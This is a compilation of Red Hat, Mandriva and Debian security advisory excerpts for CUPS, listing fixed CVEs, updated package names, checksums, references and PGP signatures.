5. Bugs fixed (https://bugzilla.redhat.com/):
978387 - Bad IPP responses with version 2.0 (collection handling bug)
1012482 - /etc/cron.daily/cups breaks rule GEN003080 in Red Hat security guide
1087122 - CVE-2014-2856 cups: cross-site scripting flaw fixed in the 1.7.2 release
1115576 - CVE-2014-3537 cups: insufficient checking leads to privilege escalation
1122600 - CVE-2014-5029 cups: Incomplete fix for CVE-2014-3537
1128764 - CVE-2014-5030 cups: allows local users to read arbitrary files via a symlink attack
1128767 - CVE-2014-5031 cups: world-readable permissions
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
ppc64:
cups-1.4.2-67.el6.ppc64.rpm
cups-debuginfo-1.4.2-67.el6.ppc.rpm
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-devel-1.4.2-67.el6.ppc.rpm
cups-devel-1.4.2-67.el6.ppc64.rpm
cups-libs-1.4.2-67.el6.ppc.rpm
cups-libs-1.4.2-67.el6.ppc64.rpm
cups-lpd-1.4.2-67.el6.ppc64.rpm
s390x:
cups-1.4.2-67.el6.s390x.rpm
cups-debuginfo-1.4.2-67.el6.s390.rpm
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-devel-1.4.2-67.el6.s390.rpm
cups-devel-1.4.2-67.el6.s390x.rpm
cups-libs-1.4.2-67.el6.s390.rpm
cups-libs-1.4.2-67.el6.s390x.rpm
cups-lpd-1.4.2-67.el6.s390x.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
ppc64:
cups-debuginfo-1.4.2-67.el6.ppc64.rpm
cups-php-1.4.2-67.el6.ppc64.rpm
s390x:
cups-debuginfo-1.4.2-67.el6.s390x.rpm
cups-php-1.4.2-67.el6.s390x.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
cups-1.4.2-67.el6.src.rpm
i386:
cups-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-lpd-1.4.2-67.el6.i686.rpm
x86_64:
cups-1.4.2-67.el6.x86_64.rpm
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-devel-1.4.2-67.el6.i686.rpm
cups-devel-1.4.2-67.el6.x86_64.rpm
cups-libs-1.4.2-67.el6.i686.rpm
cups-libs-1.4.2-67.el6.x86_64.rpm
cups-lpd-1.4.2-67.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
cups-debuginfo-1.4.2-67.el6.i686.rpm
cups-php-1.4.2-67.el6.i686.rpm
x86_64:
cups-debuginfo-1.4.2-67.el6.x86_64.rpm
cups-php-1.4.2-67.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/#package
7. References:
https://www.redhat.com/security/data/cve/CVE-2014-2856.html
https://www.redhat.com/security/data/cve/CVE-2014-3537.html
https://www.redhat.com/security/data/cve/CVE-2014-5029.html
https://www.redhat.com/security/data/cve/CVE-2014-5030.html
https://www.redhat.com/security/data/cve/CVE-2014-5031.html
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/6/html/6.6_Technical_Notes/cups.html#RHSA-2014-1388
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFUPKsIXlSAg2UNWIIRApSvAJ9WxP5yQ+v5GDRGnSINYq0Pro0AoQCfXZqW
WjIIQcBG+Sou8Is2vIFlLok=
=5S/K
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
.
A malformed file with an invalid page header and compressed raster data
can trigger a buffer overflow in cupsRasterReadPixels (CVE-2014-9679).
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2856
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3537
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5029
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5030
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9679
http://advisories.mageia.org/MGASA-2014-0193.html
http://advisories.mageia.org/MGASA-2014-0313.html
http://advisories.mageia.org/MGASA-2015-0067.html
_______________________________________________________________________
Updated Packages:
Mandriva Business Server 2/X86_64:
0d1f31885b6c118b63449f2fdd821666 mbs2/x86_64/cups-1.7.0-8.1.mbs2.x86_64.rpm
b5337600a386f902763653796a2cefdf mbs2/x86_64/cups-common-1.7.0-8.1.mbs2.x86_64.rpm
7b1513d85b5f22cd90bed23a35e44f51 mbs2/x86_64/cups-filesystem-1.7.0-8.1.mbs2.noarch.rpm
c25fa9b9bba101274984fa2b7a62f7a3 mbs2/x86_64/lib64cups2-1.7.0-8.1.mbs2.x86_64.rpm
df24a6b84fdafffaadf961ab4aa3640b mbs2/x86_64/lib64cups2-devel-1.7.0-8.1.mbs2.x86_64.rpm
5c172624c992de8ebb2bf8a2b232ee3a mbs2/SRPMS/cups-1.7.0-8.1.mbs2.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFVF6q1mqjQ0CJFipgRAuxXAKDq8A/WlNzp54yRN7xnKy8ZBaRZQwCfSAh0
n7hHPzmYVzh2wFP6PffIl0E=
=ykhv
-----END PGP SIGNATURE-----
.
For the stable distribution (wheezy), these problems have been fixed in
version 1.5.3-5+deb7u4.
For the unstable distribution (sid), these problems have been fixed in
version 1.7.4-2